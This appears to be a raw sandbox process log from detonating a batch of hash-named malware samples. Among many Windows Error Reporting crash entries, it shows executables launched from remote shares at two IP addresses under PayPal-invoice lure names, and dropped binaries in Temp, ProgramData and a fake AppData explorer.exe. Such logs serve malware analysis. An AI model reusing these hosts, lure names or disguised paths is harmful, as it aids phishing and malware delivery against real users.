"C:\Users\Admin\Downloads\2023-11-23-11\3c47f28be9b0985a64ec458337ff217346a69d670cdc582f6813f32e8d75ed52.exe"
C:\Users\Admin\Downloads\2023-11-23-11\0c5a46d8d282d84fc62077f0d955cdb6f5ba7e63e18d51271669e86b9224301a.exe
"C:\Users\Admin\Downloads\2023-11-23-11\0c5a46d8d282d84fc62077f0d955cdb6f5ba7e63e18d51271669e86b9224301a.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16931134321098190933,16403902932469870216,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6400 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16931134321098190933,16403902932469870216,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6384 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 10120 -ip 10120
C:\Users\Admin\Downloads\2023-11-23-11\273a3703b5372321e55b95fd7ef3294ff1e06e6f87efe4deb512074673a2c592.exe
"C:\Users\Admin\Downloads\2023-11-23-11\273a3703b5372321e55b95fd7ef3294ff1e06e6f87efe4deb512074673a2c592.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1012
C:\Users\Admin\Downloads\2023-11-23-11\107732c9883b6616b6c6398234d6e44843de70e8724023d62ca3e908019e58e0.exe
"C:\Users\Admin\Downloads\2023-11-23-11\107732c9883b6616b6c6398234d6e44843de70e8724023d62ca3e908019e58e0.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1020
C:\Users\Admin\Downloads\2023-11-23-11\c9ed1cac4d4b557f95dc048dc6eb874ab2f2fb9aa85554bc1ba55e2519234c3e.exe
"C:\Users\Admin\Downloads\2023-11-23-11\c9ed1cac4d4b557f95dc048dc6eb874ab2f2fb9aa85554bc1ba55e2519234c3e.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1020
C:\Users\Admin\Downloads\2023-11-23-11\c4e7f8b515bb1affff353fc47f448d67656e8adad59e5124231d314266c12d64.exe
"C:\Users\Admin\Downloads\2023-11-23-11\c4e7f8b515bb1affff353fc47f448d67656e8adad59e5124231d314266c12d64.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1212
\??\UNC\62.173.141.114\scarica\InvoicePayPal.exe
"\\62.173.141.114\scarica\InvoicePayPal.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1220
\??\UNC\62.173.141.116\scarica\paypal_inv.exe
"\\62.173.141.116\scarica\paypal_inv.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1140
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1020
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 8272 -ip 8272
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8272 -s 612
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1344
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 9196 -ip 9196
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9196 -s 1052
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 9196 -ip 9196
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9196 -s 1060
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1332
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 9196 -ip 9196
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 10120 -ip 10120
C:\Windows\SysWOW64\svchost.exe
svchost.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1416
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9196 -s 1060
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 9196 -ip 9196
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9196 -s 1124
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1464
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 9196 -ip 9196
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9196 -s 1156
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1468
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 9196 -ip 9196
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1472
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9196 -s 1164
C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe
C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe
C:\ProgramData\pinterests\XRJNZC.exe
C:\ProgramData\pinterests\XRJNZC.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 9196 -ip 9196
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1488
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9196 -s 1212
C:\Users\Admin\AppData\Roaming\update\explorer.exe
"C:\Users\Admin\AppData\Roaming\update\explorer.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 9196 -ip 9196
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9196 -s 1376
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1492
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1484
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 8572 -ip 8572
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8572 -s 604
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1492
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1508
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1492
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1364
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1524
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1152
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1228
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1308
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1212
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1308
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1224
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1308
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1228
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1308
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1416
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1296
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\2023-11-23-11\english.lang"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,16931134321098190933,16403902932469870216,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6388 /prefetch:2
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1292
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1296
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1304
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=352BDEAAF6E4DE23B0F5C92E323F7FD0 --mojo-platform-channel-handle=1740 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=A5778EA36F452CE5B227CA786B21E96F --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=A5778EA36F452CE5B227CA786B21E96F --renderer-client-id=2 --mojo-platform-channel-handle=1748 --allow-no-sandbox-job /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=8283D8FE007B405FF19D6E66F315358D --mojo-platform-channel-handle=2304 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 10120 -ip 10120
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=3892288F60D5FEED774B777113302FEA --mojo-platform-channel-handle=1804 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1308
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1312
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\2023-11-23-11\aa641dbc9ba61f0b29a8bbb5deda6e48d53a9af403f6fcff3d65ddc3b8d84156\" -spe -an -ai#7zMap7453:218:7zEvent28125
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1308
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1292
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\2023-11-23-11\917602de9f090920833163da75a8c9f6caa9b0fd7a2715bf95eb8c5a7067d114\" -spe -an -ai#7zMap16741:218:7zEvent24048
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1308
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1224
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\2023-11-23-11\79e0fcb3dba988510f42059372ddd0cc77723aba3ed40d7220ca44467e790b6e\" -spe -an -ai#7zMap27302:218:7zEvent17547
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1532
C:\Users\Admin\Downloads\2023-11-23-11\3c47f28be9b0985a64ec458337ff217346a69d670cdc582f6813f32e8d75ed52.exe
"C:\Users\Admin\Downloads\2023-11-23-11\3c47f28be9b0985a64ec458337ff217346a69d670cdc582f6813f32e8d75ed52.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1328
C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe
C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe
C:\ProgramData\pinterests\XRJNZC.exe
C:\ProgramData\pinterests\XRJNZC.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 10120 -ip 10120
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1488
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1308
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1500
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1296
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1500
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1532
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1500
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1156
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1488
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1492
\??\UNC\62.173.141.116\scarica\paypal_inv.exe
"\\62.173.141.116\scarica\paypal_inv.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1084
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1136
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6992 -ip 6992
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6992 -s 516
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1552
\??\UNC\62.173.141.114\scarica\InvoicePayPal.exe
"\\62.173.141.114\scarica\InvoicePayPal.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1148
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1424
C:\Windows\SysWOW64\WerFault.exe
